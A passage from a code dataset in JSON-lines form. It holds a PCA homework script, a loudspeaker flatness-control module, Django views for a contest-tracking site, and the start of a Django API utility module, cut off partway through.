np.transpose(xmew)\r\n #pca.append(xmew.dot(trans))\r\n xmew = sample-mew\r\n trans = np.transpose(xmew)\r\n sig = xmew.dot(trans)\r\n sig = np.asarray(sig)\r\n return (sig.dot(1/n))\r\n\r\n\r\n\r\n# you will find p number of PCA projection vectors w1, w2, ..., wp\r\n# we stypically store them in a p-by-k matrix \"w\"; each column being one vector\r\n# typically, vectors are sorted in a way that, 1st column is the optimal, 2nd column is the 2nd optimal, etc\r\n# tip: many libraries will automatically sort eigenvectors based on their eigenvalues\r\n#w = .....\r\n\r\n#print(getMew().shape)\r\n#print(sample.shape)\r\n\r\nsig = getSigma() #start off by getting our sigma\r\neigvals, eigvecs = np.linalg.eig(sig) #eigvecs is the w vector\r\nprint(eigvals.shape,eigvecs.shape)\r\nprint(np.argmax(eigvals))\r\n#now to utilize w_1 and w_2\r\n# Plot Figure 1 based on w1 and w2\r\nsample_pca_1 = eigvecs[0] # this is a n-by-1 vector; each row is one instance and the value is its projection on w1 (1st pca feature)\r\nsample_pca_2 = eigvecs[1] # same, but projection on w2\r\nprint(sample_pca_1.shape,sample_pca_2.shape)\r\nmpl.plot(sample_pca_1,label=\"w1\")\r\nmpl.plot(sample_pca_2,label=\"w2\")\r\nmpl.title(\"W1 and W2\")\r\nmpl.legend()\r\nmpl.show()\r\nmpl.clf()\r\n\r\n# Plot Figure 2 based on w(p-1) and wp\r\nsample_pca_p_1 = eigvecs[len(eigvecs)-2] # same, but projection on w(p-1)\r\nsample_pca_p = eigvecs[len(eigvecs)-1] # same, but projection on wp\r\n# now plot data distribution based on these two features\r\nmpl.plot(sample_pca_p_1,label=\"w1\")\r\nmpl.plot(sample_pca_p,label=\"w2\")\r\nmpl.title(\"W1 and W2\")\r\nmpl.legend()\r\nmpl.show()\r\n","sub_path":"ml20_hw9/hw9_t2.py","file_name":"hw9_t2.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"222650381","text":"import sympy as sp\nimport numpy as np\nimport sys\nfrom signal_processing import integrate\nfrom signal_processing import differentiate\nfrom signal_processing import differentiate_nofilt\nfrom PHS import lambdify\n\ndef command_output(u,s,Te,Bl,H_susp,H_bob,H_inert,Z_resist,Z_visco,TARGET):\n \n [xi,dtxi,dt2xi,dt3xi] = command_input(u,s,Te,TARGET)\n f = command_func(Te,Bl,H_susp,H_bob,H_inert,Z_resist,Z_visco)\n return f(xi,dtxi,dt2xi,dt3xi),xi\n \ndef command_input(u,s,Te,TARGET):\n \"\"\"\n Calculates all the quantities necessary to design the new command u_flat\n xi is the targetted displacement or acceleration\n \"\"\"\n if TARGET == 'acc':\n s_acc = s*(2*np.pi*40)**2\n dt2xi = s_acc*u\n dt3xi = differentiate(dt2xi,Te)\n dtxi = integrate(dt2xi,Te)\n xi = integrate(dtxi,Te)\n elif TARGET == 'dpt':\n xi = s*u\n dtxi = differentiate_nofilt(xi,Te)\n dt2xi = differentiate_nofilt(dtxi,Te)\n dt3xi = differentiate_nofilt(dt2xi,Te)\n else:\n print ('Error in TARGET option. Choose Yes or No.')\n sys.exit(0)\n \n return xi,dtxi,dt2xi,dt3xi\n \ndef command_func(Te,Bl,H_susp,H_bob,H_inert,Z_resist,Z_visco):\n xi = sp.symbols('xi')\n dtxi = sp.symbols('dtxi')\n dt2xi = sp.symbols('dt2xi')\n dt3xi = sp.symbols('dt3xi')\n \n dxH_susp = lambdify([xi],H_susp(xi).diff())\n dx2H_susp = lambdify([xi],dxH_susp(xi).diff())\n Re = Z_resist(xi).diff()\n Rme = Z_visco(xi).diff()\n Le = 1/(H_bob(xi).diff().diff())\n Mm = 1/(H_inert(xi).diff().diff())\n \n dxBl_x = Bl(xi).diff()\n e1 = Bl(xi)*dtxi\n e2 = (Re/Bl(xi))*(dxH_susp(xi) + Rme*dtxi + Mm*dt2xi)\n e3 = Le*((Bl(xi)*(dtxi*dx2H_susp(xi) + Rme*dt2xi + Mm*dt3xi) - dtxi*dxBl_x*(dxH_susp(xi) + Rme*dtxi + Mm*dt2xi))/(Bl(xi)**2))\n return lambdify([xi,dtxi,dt2xi,dt3xi],(e1+e2+e3))\n \ndef fade(time,T,u):\n \"\"\"\n Create a signal f based on time vector t_num such as:\n * f(t_num = 0) = 0 and all its derivatives until order 3\n * f(t_num > T_num) = 1\n This signal f is meant to fade another signal g by doing f.g \n \"\"\"\n t = sp.symbols('t')\n fade_exp = sp.Piecewise((35*(t/T)**4 - 84*(t/T)**5 + 70*(t/T)**6 - 20*(t/T)**7 ,t<= T),(1,True))\n f = lambdify([t],fade_exp)\n fade_num = np.array(list(map(f,time)))\n u_faded = fade_num*u\n return u_faded","sub_path":"flatness.py","file_name":"flatness.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"261217666","text":"import collections\nimport re\nimport json\n\nfrom django.conf import settings as django_settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.urls import reverse\nfrom django.db.models import Count, F, Q, Exists, Case, When, Value, OuterRef, BooleanField\nfrom django.http import HttpResponse, HttpResponseBadRequest, HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom django.utils import timezone\nfrom tastypie.models import ApiKey\nfrom django_countries import countries\nfrom el_pagination.decorators import page_template\n\nfrom clist.models import Resource, Contest\nfrom clist.templatetags.extras import get_timezones, format_time\nfrom clist.views import get_timezone\nfrom my_oauth.models import Service\nfrom notification.forms import Notification, NotificationForm\nfrom ranking.models import Statistics, Module, Account\nfrom true_coders.models import Filter, Party, Coder, Organization\nfrom events.models import Team, TeamStatus\nfrom utils.regex import verify_regex\n\n\n@page_template('profile_contests_paging.html')\ndef profile(request, username, template='profile.html', extra_context=None):\n coder = get_object_or_404(Coder, user__username=username)\n statistics = Statistics.objects \\\n .filter(account__in=coder.account_set.all()) \\\n .select_related('contest', 'contest__resource', 'account') \\\n .order_by('-contest__end_time')\n\n search = request.GET.get('search')\n if search is not None:\n if search.startswith('problem:'):\n _, search = search.split(':', 1)\n search_re = verify_regex(search)\n statistics = statistics.filter(addition__problems__iregex=f'\"[^\"]*{search_re}[^\"]*\"')\n elif search.startswith('contest:'):\n _, search = search.split(':', 1)\n statistics = statistics.filter(contest__id=search)\n else:\n search_re = verify_regex(search)\n query = Q(contest__resource__host__iregex=search_re) | Q(contest__title__iregex=search_re)\n statistics = statistics.filter(query)\n\n accounts = coder.account_set.select_related('resource').order_by('pk')\n\n context = {\n 'coder': coder,\n 'accounts': accounts,\n 'statistics': statistics,\n }\n\n if extra_context is not None:\n context.update(extra_context)\n return render(request, template, context)\n\n\n@login_required\ndef settings(request):\n coder = request.user.coder\n notification_form = NotificationForm(coder)\n if request.method == 'POST':\n if request.POST.get('action', None) == 'notification':\n notification_form = NotificationForm(coder, request.POST)\n if notification_form.is_valid():\n notification = notification_form.save(commit=False)\n if notification.method == Notification.TELEGRAM and not coder.chat:\n return HttpResponseRedirect(django_settings.HTTPS_HOST_ + reverse('telegram:me'))\n notification.coder = coder\n notification.save()\n return HttpResponseRedirect(reverse('coder:settings') + '#notifications-tab')\n\n if request.GET.get('as_coder') and request.user.has_perm('as_coder'):\n coder = Coder.objects.get(user__username=request.GET['as_coder'])\n\n resources = Resource.objects.all()\n coder.filter_set.filter(resources=[], contest__isnull=True).delete()\n\n return render(\n request,\n \"settings.html\",\n {\n \"resources\": resources,\n \"coder\": coder,\n \"services\": Service.objects.all(),\n \"categories\": coder.get_categories(),\n \"notification_form\": notification_form,\n \"modules\": Module.objects.order_by('resource__id').all(),\n },\n )\n\n\n@login_required\ndef change(request):\n name = request.POST.get(\"name\", None)\n value = request.POST.get(\"value\", None)\n\n if value in [\"true\", \"false\"]:\n value = \"1\" if value == \"true\" else \"0\"\n\n user = request.user\n coder = user.coder\n\n if coder.id != int(request.POST.get(\"pk\", -1)):\n return HttpResponseBadRequest(\"invalid pk\")\n if name == \"timezone\":\n if value not in (tz[\"name\"] for tz in get_timezones()):\n return HttpResponseBadRequest(\"invalid timezone name\")\n coder.timezone = value\n coder.save()\n elif name == \"check-timezone\":\n if value not in [\"0\", \"1\", ]:\n return HttpResponseBadRequest(\"invalid check timezone value\")\n coder.settings[\"check_timezone\"] = int(value)\n coder.save()\n elif name == \"time-format\":\n try:\n format_time(timezone.now(), value)\n except Exception as e:\n return HttpResponseBadRequest(e)\n coder.settings[\"time_format\"] = value\n if value == \"\":\n coder.settings.pop(\"time_format\")\n coder.save()\n elif name == \"add-to-calendar\":\n if value not in [\n 'enable',\n 'disable',\n 'iCalendar',\n 'Google Calendar',\n 'Outlook',\n 'Outlook Online',\n 'Yahoo! Calendar',\n ]:\n return HttpResponseBadRequest(\"invalid addtocalendar value\")\n coder.settings[\"add_to_calendar\"] = value\n coder.save()\n elif name == \"view-mode\":\n if value in [\"0\", \"1\"]:\n value = \"list\" if value == \"1\" else \"calendar\"\n if value not in [\"list\", \"calendar\", ]:\n return HttpResponseBadRequest(\"invalid view mode\")\n coder.settings[\"view_mode\"] = value\n coder.save()\n elif name in [\"hide-contest\", \"all-standings\", \"open-new-tab\", \"group-in-list\", \"calendar-filter-long\"]:\n if value not in [\"0\", \"1\", ]:\n return HttpResponseBadRequest(f\"invalid {name} value\")\n key = name.replace('-', '_')\n coder.settings[key] = int(value)\n coder.save()\n elif name == \"email\":\n if value not in (token.email for token in coder.token_set.all()):\n return HttpResponseBadRequest(\"invalid email\")\n user.email = value\n user.save()\n elif name == \"country\":\n coder.country = value\n coder.save()\n elif name == \"filter\":\n try:\n field = \"Filter id\"\n id_ = int(request.POST.get(\"value[id]\", -1))\n filter_ = Filter.objects.get(pk=id_, coder=coder)\n\n filter_.name = request.POST.get(\"value[name]\", \"\").strip().replace(\"'\", \"\") or None\n\n field = \"Duration\"\n duration_from = request.POST.get(\"value[duration][from]\", None)\n filter_.duration_from = int(duration_from) if duration_from and duration_from != \"NaN\" else None\n\n duration_to = request.POST.get(\"value[duration][to]\", None)\n filter_.duration_to = int(duration_to) if duration_to and duration_to != \"NaN\" else None\n\n if filter_.duration_from and filter_.duration_to and filter_.duration_from > filter_.duration_to:\n raise Exception(\"{from} should be less or equal {to}\")\n\n field = \"Regex\"\n regex = request.POST.get(\"value[regex]\", None)\n if regex:\n re.compile(regex)\n Contest.objects.filter(title__regex=regex).first()\n filter_.regex = regex if regex else None\n\n field = \"Inverse regex\"\n filter_.inverse_regex = request.POST.get(\"value[inverse_regex]\", \"false\") == \"true\"\n\n if filter_.inverse_regex and not filter_.regex:\n raise Exception(\"inverse set but regex is empty\")\n\n field = \"To show\"\n filter_.to_show = request.POST.get(\"value[to_show]\", \"false\") == \"true\"\n\n field = \"Resources\"\n filter_.resources = list(map(int, request.POST.getlist(\"value[resources][]\", [])))\n if Resource.objects.filter(pk__in=filter_.resources).count() != len(filter_.resources):\n raise Exception(\"invalid id\")\n\n field = \"Contest\"\n contest_id = request.POST.get(\"value[contest]\", None)\n if contest_id:\n filter_.contest = Contest.objects.get(pk=contest_id)\n else:\n filter_.contest = None\n\n field = \"Resources and contest\"\n if not filter_.resources and not filter_.contest:\n raise Exception(\"empty\")\n\n categories = coder.get_categories()\n field = \"Categories\"\n filter_.categories = request.POST.getlist(\"value[categories][]\", [])\n if not all([c in categories for c in filter_.categories]):\n raise Exception(\"invalid value(s)\")\n if len(filter_.categories) == 0:\n raise Exception(\"empty\")\n\n filter_.save()\n except Exception as e:\n return HttpResponseBadRequest(\"%s: %s\" % (field, e))\n elif name == \"add-filter\":\n if coder.filter_set.count() >= 50:\n return HttpResponseBadRequest(\"reached the limit number of filters\")\n filter_ = Filter.objects.create(coder=coder)\n return HttpResponse(json.dumps(filter_.dict()), content_type=\"application/json\")\n elif name == \"delete-filter\":\n try:\n id_ = int(request.POST.get(\"id\", -1))\n filter_ = Filter.objects.get(pk=id_, coder=coder)\n filter_.delete()\n except Exception as e:\n return HttpResponseBadRequest(e)\n elif name in (\"delete-notification\", \"reset-notification\", ):\n try:\n id_ = int(request.POST.get(\"id\", -1))\n n = Notification.objects.get(pk=id_, coder=coder)\n if name == \"delete-notification\":\n n.delete()\n elif name == \"reset-notification\":\n n.last_time = timezone.now()\n n.save()\n except Exception as e:\n return HttpResponseBadRequest(e)\n elif name == \"first-name\":\n if not value:\n return HttpResponseBadRequest(\"empty first name\")\n user.first_name = value\n user.save()\n elif name == \"last-name\":\n if not value:\n return HttpResponseBadRequest(\"empty last name\")\n user.last_name = value\n user.save()\n elif name == \"first-name-native\":\n if not value:\n return HttpResponseBadRequest(\"empty first name in native language\")\n coder.first_name_native = value\n coder.save()\n elif name == \"last-name-native\":\n if not value:\n return HttpResponseBadRequest(\"empty last name in native language\")\n coder.last_name_native = value\n coder.save()\n elif name == \"add-account\":\n if not value:\n return HttpResponseBadRequest(\"empty account value\")\n try:\n resource_id = int(request.POST.get(\"resource\"))\n resource = Resource.objects.get(pk=resource_id)\n account, created = Account.objects.get_or_create(resource=resource, key=value)\n if not created:\n if account.coders.filter(pk=coder.id).first():\n raise Exception('Account is already connect to this coder')\n if account.coders.count():\n module = Module.objects.filter(resource=resource).first()\n if not module or not module.multi_account_allowed:\n raise Exception('Account is already connect')\n account.coders.add(coder)\n account.save()\n return HttpResponse(json.dumps(account.dict()), content_type=\"application/json\")\n except Exception as e:\n return HttpResponseBadRequest(e)\n elif name == \"delete-account\":\n if not value:\n return HttpResponseBadRequest(\"empty account value\")\n try:\n host = request.POST.get(\"resource\")\n account = Account.objects.get(resource__host=host, key=value)\n account.coders.remove(coder)\n except Exception as e:\n return HttpResponseBadRequest(e)\n else:\n return HttpResponseBadRequest(\"unknown query\")\n\n return HttpResponse(\"accepted\")\n\n\n@login_required\ndef search(request, **kwargs):\n query = request.GET.get('query', None)\n if not query or not isinstance(query, str):\n return HttpResponseBadRequest('invalid query')\n\n count = int(request.GET.get('count', 10))\n page = int(request.GET.get('page', 1))\n if query == 'account':\n resource_id = int(request.GET.get('resource', -1))\n qs = Account.objects.filter(resource__id=resource_id)\n if 'user' in request.GET:\n user = request.GET.get('user')\n condition = Q()\n for pattern in user.split():\n pattern_re = verify_regex(pattern)\n condition = condition & (Q(key__iregex=pattern_re) | Q(name__iregex=pattern_re))\n qs = qs.filter(condition)\n\n total = qs.count()\n qs = qs[(page - 1) * count:page * count]\n ret = [\n {'id': a.key, 'text': f'{a.key} - {a.name}' if a.name and a.key.find(a.name) == -1 else a.key}\n for a in qs\n ]\n elif query == 'organization':\n qs = Organization.objects.all()\n\n name = request.GET.get('name')\n if name:\n qs = qs.filter(Q(name__icontains=name) | Q(name_ru__icontains=name) | Q(abbreviation__icontains=name))\n\n total = qs.count()\n qs = qs[(page - 1) * count:page * count]\n ret = [{'id': o.name, 'text': o.name} for o in qs]\n elif query == 'team':\n qs = Team.objects.all()\n\n name = request.GET.get('name')\n if name:\n qs = qs.filter(name__icontains=name)\n\n event = kwargs.get('event')\n if event:\n qs = qs.filter(event=event)\n qs = qs.annotate(disabled=Case(\n When(status=TeamStatus.NEW, then=Value(False)),\n default=Value(True),\n output_field=BooleanField())\n ).order_by('disabled', '-modified')\n\n total = qs.count()\n qs = qs[(page - 1) * count:page * count]\n ret = [{'id': r.id, 'text': r.name, 'disabled': r.disabled} for r in qs]\n elif query == 'country':\n qs = list(countries)\n name = request.GET.get('name')\n if name:\n name = name.lower()\n qs = [(c, n) for c, n in countries if name in n.lower()]\n total = len(qs)\n qs = qs[(page - 1) * count:page * count]\n ret = [{'id': c, 'text': n} for c, n in qs]\n elif query == 'notpast':\n title = request.GET.get('title')\n qs = Contest.objects.filter(title__iregex=verify_regex(title), end_time__gte=timezone.now())\n total = qs.count()\n qs = qs[(page - 1) * count:page * count]\n ret = [{'id': c.id, 'text': c.title} for c in qs]\n elif query == 'field-to-select':\n text = request.GET.get('text')\n field = request.GET.get('field')\n assert '__' not in field\n field = f'addition__{field}'\n contest = get_object_or_404(Contest, pk=request.GET.get('cid'))\n qs = contest.statistics_set.filter(**{f'{field}__icontains': text}).distinct(field).values_list(field)\n\n total = qs.count()\n qs = qs[(page - 1) * count:page * count]\n ret = [{'id': f[0], 'text': f[0]} for f in qs]\n else:\n return HttpResponseBadRequest('invalid query')\n\n result = {\n 'items': ret,\n 'more': page * count <= total,\n }\n\n return HttpResponse(json.dumps(result, ensure_ascii=False), content_type=\"application/json\")\n\n\ndef get_api_key(request):\n if not request.user.is_authenticated:\n return HttpResponse('Unauthorized', status=401)\n if hasattr(request.user, 'api_key') and request.user.api_key is not None:\n api_key = request.user.api_key\n else:\n api_key = ApiKey.objects.create(user=request.user)\n return HttpResponse(api_key.key)\n\n\n@login_required\ndef party_action(request, secret_key, action):\n party = get_object_or_404(Party.objects.for_user(request.user), secret_key=secret_key)\n coder = request.user.coder\n if coder.party_set.filter(pk=party.id).exists():\n if action == 'join':\n messages.warning(request, 'You are already in %s.' % party.name)\n elif action == 'leave':\n coder.party_set.remove(party)\n messages.success(request, 'You leave party %s.' % party.name)\n else:\n if action == 'join':\n party.coders.add(coder)\n messages.success(request, 'You join to %s.' % party.name)\n elif action == 'leave':\n messages.warning(request, 'You are not there in %s.' % party.name)\n return HttpResponseRedirect(reverse('coder:party', args=[party.slug]))\n\n\ndef party(request, slug):\n party = get_object_or_404(Party.objects.for_user(request.user), slug=slug)\n\n has_statistics = Statistics.objects.filter(contest_id=OuterRef('pk'))\n party_contests = Contest.objects \\\n .filter(rating__party=party) \\\n .annotate(has_statistics=Exists(has_statistics)) \\\n .order_by('-end_time')\n\n coders = party.coders.filter(\n account__resource__contest__rating__party=party,\n account__resource__contest__statistics__account=F('account')\n ).annotate(\n n_participations=Count('account__resource')\n ).order_by(\n '-n_participations'\n ).select_related(\n 'user'\n )\n set_coders = set(coders)\n\n if request.user.is_authenticated:\n ignore_filters = request.user.coder.filter_set.filter(categories__contains=['calendar']).order_by('created')\n ignore_filters = list(ignore_filters.values('id', 'name'))\n else:\n ignore_filters = []\n ignore_filters.append({'id': 0, 'name': 'disable long'})\n\n results = []\n total = {}\n\n contests = Contest.objects.filter(rating__party=party)\n future = contests.filter(end_time__gt=timezone.now()).order_by('start_time')\n\n statistics = Statistics.objects.filter(\n account__coders__in=party.coders.all(),\n contest__in=party_contests.filter(start_time__lt=timezone.now()),\n ) \\\n .order_by('-contest__end_time') \\\n .select_related('contest', 'account') \\\n .prefetch_related('account__coders', 'account__coders__user')\n\n contests_standings = collections.OrderedDict(\n (c, []) for c in contests.filter(end_time__lt=timezone.now()).order_by('-end_time')\n )\n for statistic in statistics:\n contest = statistic.contest\n contests_standings.setdefault(contest, [])\n for coder in statistic.account.coders.all():\n if coder in set_coders:\n contests_standings[contest].append({\n 'solving': statistic.solving,\n 'upsolving': statistic.upsolving,\n 'stat': statistic,\n 'coder': coder,\n })\n\n for contest, standings in contests_standings.items():\n if standings:\n\n max_solving = max([s['solving'] for s in standings]) or 1\n max_total = max([s['solving'] + s['upsolving'] for s in standings]) or 1\n\n for s in standings:\n solving = s['solving']\n upsolving = s['upsolving']\n s['score'] = 4. * (solving + upsolving) / max_total + 1. * solving / max_solving\n s['interpretation'] = f'4 * ({solving} + {upsolving}) / {max_total} + {solving} / {max_solving}'\n\n max_score = max([s['score'] for s in standings]) or 1\n for s in standings:\n s['score'] = 100. * s['score'] / max_score\n s['interpretation'] = [f'100 * ({s[\"interpretation\"]}) / {max_score}']\n\n standings.sort(key=lambda s: s['score'], reverse=True)\n\n for s in standings:\n coder = s['coder']\n d = total.setdefault(coder.id, {})\n d['score'] = s['score'] + d.get('score', 0)\n d['coder'] = coder\n d['num'] = d.setdefault('num', 0) + 1\n d['avg'] = f\"{(d['score'] / d['num']):.2f}\"\n\n d, s = d.setdefault('stat', {}), s['stat']\n\n solved = s.addition.get('solved', {})\n d['solving'] = solved.get('solving', s.solving) + d.get('solving', 0)\n d['upsolving'] = solved.get('upsolving', s.upsolving) + d.get('upsolving', 0)\n\n results.append({\n 'contest': contest,\n 'standings': standings,\n })\n\n total = sorted(list(total.values()), key=lambda d: d['score'], reverse=True)\n results.insert(0, {\n 'standings': total,\n 'fields': [('Num', 'num', 'Number contests'), ('Avg', 'avg', 'Average score')],\n })\n\n for result in results:\n place = 0\n prev = None\n for i, s in enumerate(result['standings']):\n if prev != s['score']:\n prev = s['score']\n place = i + 1\n s['place'] = place\n\n return render(\n request,\n 'party.html',\n {\n 'ignore_filters': [],\n 'fixed_ignore_filters': ignore_filters,\n 'timezone': get_timezone(request),\n 'future': future,\n 'party': party,\n 'party_contests': party_contests,\n 'results': results,\n 'coders': coders,\n },\n )\n\n\ndef parties(request):\n parties = Party.objects.for_user(request.user).order_by('-created')\n parties = parties.prefetch_related('coders', 'rating_set')\n return render(request, 'parties.html', {'parties': parties})\n","sub_path":"true_coders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":21510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"342992346","text":"from django.http import JsonResponse, FileResponse\nfrom django.views.decorators.http import require_http_methods\nfrom django.forms.models import model_to_dict\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.conf import settings\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nfrom django.db import connection, close_old_connections\nfrom api.extensions.custom_response import *\nfrom queue import Queue\nfrom api.models import *\nimport json\nimport time\nimport datetime\nimport os\nimport base64\n\n\n# @require_http_methods([\"GET\"])\ndef test(req):\n if req.user.is_superuser:\n print(\"是\")\n else:\n print(\"不是\")\n\ndef task_count():\n tasks = TestTask.m.filter()\n all_count = 0\n for task in tasks:\n count = len(str_to_list(task.case_ids))\n print(task.id, count)\n all_count += count\n\n print(all_count)\n return response_200()\n\n\n# 发送邮件调试\ndef test2(req):\n wwx = WorkWXApply(2)\n # response_400(data={\"a\":1}, raise_flag=True)\n if not wwx.msg:\n textcard = {\n \"description\": \"接口测试平台主页:\\nhttp://10.112.16.6/home\",\n \"title\": \"测试任务-测试报告\",\n \"btntxt\": \"查看详情\",\n \"url\": \"http://10.112.16.6/home\"\n }\n wwx.send_msg(\"guojing02\", textcard)\n if wwx.msg:\n return response_400(wwx.msg)\n else:\n return response_200()\n else:\n return response_400(wwx.msg)\n\n # item = {\n # \"body\": str(req.body),\n # \"GET\": dict(req.GET),\n # \"POST\": dict(req.POST),\n # \"user\": req.POST.get(\"user\", None)\n # }\n return response_200(item)\n\n\ndef get_now_time():\n return datetime.datetime.now()\n\n\ndef json_dumps(data):\n return json.dumps(data, ensure_ascii=False)\n\n\ndef json_dumps_indent4(data):\n return json.dumps(data, ensure_ascii=False, indent=4)\n\n\ndef page_handel(req, raw_data, model_to_dict_handle=True):\n item = {\n \"page\": None,\n \"page_size\": None,\n \"count\": len(raw_data),\n \"data\": [],\n }\n page = req.GET.get(\"page\", \"1\")\n page_size = req.GET.get(\"page_size\", \"10\")\n # page_size为-1表示要所有数据不分页\n if page_size == \"-1\":\n data = raw_data\n else:\n # page 如果只包含正整数并且不为0 则 int(), 否则为1\n page = int(page) if page.isdigit() and page != \"0\" else 1\n page_size = int(page_size) if page_size.isdigit() and page_size != \"0\" else 10\n\n data = raw_data[((page - 1) * page_size):((page - 1) * page_size) + page_size]\n\n item[\"page\"] = page\n item[\"page_size\"] = page_size\n\n if model_to_dict_handle:\n for i in data:\n item[\"data\"].append(model_to_dict(i))\n else:\n item[\"data\"] = data\n\n return item\n\n\ndef get_user_info_for_session(req, item=None, create=False):\n \"\"\"\n 从用户信息\n :param req:\n :param create: 是否为创建\n :param item: 如果传了item,会把用户信息user_info update到item中,\n :return: user_info\n \"\"\"\n try:\n user = str(req.session.get(\"user\"))\n user_id = req.session.get('_auth_user_id')\n # print(req.session)\n except Exception as e:\n response_400_raise_exception(\"获取用户名,用户id时出错:{}\".format(e))\n else:\n c_time = str(get_now_time())\n user_info = {\n \"latest_update_user\": user,\n \"latest_update_user_id\": user_id,\n \"u_date\": c_time,\n }\n if create:\n user_info[\"create_user\"] = user\n user_info[\"create_user_id\"] = user_id\n user_info[\"c_date\"] = c_time\n\n if item:\n item.update(user_info)\n\n return user_info\n\n\n@login_required\n@require_http_methods([\"POST\"])\ndef excel_json_auto_switch(req):\n sample_data_raw = req.POST.get(\"sample_data\", \"\")\n sample_data = None\n\n if not sample_data_raw:\n return response_400(\"样例数据为空!\")\n\n try:\n sample_data_json = json.loads(sample_data_raw)\n\n except:\n sample_data = sample_data_wsitch_json(sample_data_raw)\n\n else:\n if type(sample_data_json) == str:\n sample_data = sample_data_wsitch_json(sample_data_raw)\n elif type(sample_data_json) == list:\n sample_data = sample_data_wsitch_excel(sample_data_json)\n else:\n return response_400(\"样例数据格式有误,请检查修改!\")\n\n return response_200(sample_data=sample_data)\n\n\ndef sample_data_wsitch_excel(sample_data_json):\n lines = []\n if not sample_data_json:\n return \"\"\n try:\n headers = sample_data_json[0].keys()\n lines.append(\"\\t\".join(headers))\n\n for i in sample_data_json:\n item = []\n for h in headers:\n item.append(i[h])\n lines.append(\"\t\".join(item))\n\n sample_data_str = \"\\n\".join(lines)\n return sample_data_str\n\n except Exception as e:\n return response_400(\"样例数据格式有误,请检查修改!\")\n\n\ndef sample_data_wsitch_json(sample_data_raw):\n sample_data_json = []\n\n try:\n sample_data_list = [i.split(\"\\t\") for i in sample_data_raw.strip(\" \").split(\"\\n\") if i]\n\n row = len(sample_data_list[0])\n cos = len(sample_data_list)\n\n if cos == 1:\n response_400_raise_exception(\"测试样例数据有误1,请检查!(至少两行数据)\")\n\n for c in range(1, cos):\n sample_data_item = {}\n for r in range(row):\n sample_data_item[sample_data_list[0][r]] = sample_data_list[c][r]\n sample_data_json.append(sample_data_item)\n\n sample_data_json = json_dumps_indent4(sample_data_json)\n return sample_data_json\n\n except Exception as e:\n response_400_raise_exception(\"测试样例数据有误2,请检查!\\r\\n{}\".format(e))\n\n\n# 分割逗号\ndef str_to_list(strs, flag=\",\"):\n \"\"\"\n :param strs: 字符串\n :param flag: 分隔符\n :return: 字符串以分隔符分割,并且每个元素strip并且不要空的\n \"1,2 ,2 ,3, ,\" ==> ['1', '2', '2', '3']\n \"\"\"\n strs = strs or \"\"\n return [i.strip() for i in strs.strip().split(flag) if i.strip()]\n\n\n@require_http_methods([\"POST\"])\n# 只限params, kv格式转成json格式\ndef switch_json(req):\n param_keys = req.POST.getlist(\"param_key\", [])\n param_values = req.POST.getlist(\"param_value\", [])\n try:\n\n warning = []\n params = {}\n # 键值对格式转换成dict格式\n for i in range(len(param_keys)):\n if param_keys[i].strip():\n params[param_keys[i]] = param_values[i]\n else:\n warning.append(\"params名称为空的参数已被忽略!\")\n # print(params)\n\n warning = \",\".join(warning)\n return response_200(data=params, warning=warning)\n\n except Exception as e:\n return response_400(\"出错:{}\".format(e))\n\n\n@require_http_methods([\"POST\"])\ndef switch_kv(req):\n jp = req.POST.get(\"json_params\", \"\")\n try:\n data = json.loads(jp)\n return response_200(data=data)\n\n except:\n return response_400(\"json格式数据有错误或者为空!\")\n\n\n@require_http_methods([\"POST\"])\n# f12 粘贴的数据格式转换成json格式\ndef F12_p_to_json(req):\n params = req.POST.get(\"params\", \"\")\n\n try:\n dict_params = {i.split(\": \")[0]: i.split(\": \", 1)[-1] for i in params.split(\"\\n\") if i}\n data = json_dumps_indent4(dict_params)\n\n return response_200(data=data)\n\n except Exception as e:\n\n return response_400(\"出错:{}\".format(e))\n\n\n# 将从表单获取的kv形式的param和header转换成字典\ndef kv_switch_dict(k, v):\n \"\"\"\n k,v 皆为长度一样的列表,返回{k[i]:v[i]...}\n \"\"\"\n\n item = {}\n warning = []\n\n for i in range(len(k)):\n if k[i].strip():\n item[k[i]] = v[i]\n else:\n warning.append(\"名称为空的参数已被忽略!\")\n\n return {\n \"temp\": item,\n \"warning\": warning,\n }\n\n\n# 验证非空\ndef verify_not_is_None(item, fileds):\n \"\"\"\n :param item: 字典格式数据\n :param fileds: 要验证的字段\n :return: 如果是空的字段,返回字段名,\n 所有字段都不为空,返回None\n \"\"\"\n for i in fileds:\n if not item[i]:\n return i\n else:\n return None\n\n\n# 验证是否为json格式\ndef verify_is_json_and_switch(item, fileds, switch=True):\n \"\"\"\n :param item: 字典格式数据\n :param fileds: 字典里面要验证的字段\n :return: 是josn格式,返回None,否则返回错误信息\n \"\"\"\n for i in fileds:\n # 如果值不为None\n if item[i]:\n try:\n j = json.loads(item[i])\n if type(j) == str or type(j) == int:\n return \"{}必须为json格式,当前为字符串或数字格式!\".format(i)\n if switch:\n item[i] = j\n except:\n return \"{}必须为json格式\".format(i)\n else:\n if type(j) == str:\n return \"{}必须为json格式\".format(i)\n\n\n# 字典转换json\ndef dict_to_json(item, fileds):\n for i in fileds:\n if item[i]:\n item[i] = json_dumps(item[i])\n else:\n item[i] = \"\"\n\n\n@require_http_methods([\"POST\"])\n# 添加时间戳\ndef add_sign(req):\n \"\"\"\n 获取cookies值,转换成字典格式,将字典中sign的值赋为当前时间戳\n \"\"\"\n try:\n cookies = req.POST[\"cookies\"]\n if cookies:\n dict_cookies = json.loads(cookies)\n else:\n dict_cookies = {}\n\n timestamp = str(int(time.time() * 1000))\n dict_cookies['sign'] = timestamp\n\n data = json_dumps_indent4(dict_cookies)\n return response_200(data=data)\n\n except Exception as e:\n return response_400(\"错误:{}\".format(e))\n\n\n# 多线程\nclass Futures:\n\n def __init__(self, max_workers):\n self.executor = ThreadPoolExecutor(max_workers=max_workers) # 线程池,执行器\n self.tasks = [] # 线程集合\n\n def submit(self, func, arg, *args, **kwargs):\n task = self.executor.submit(func, arg, *args, **kwargs)\n self.tasks.append(task)\n return task\n\n def as_completed(self):\n 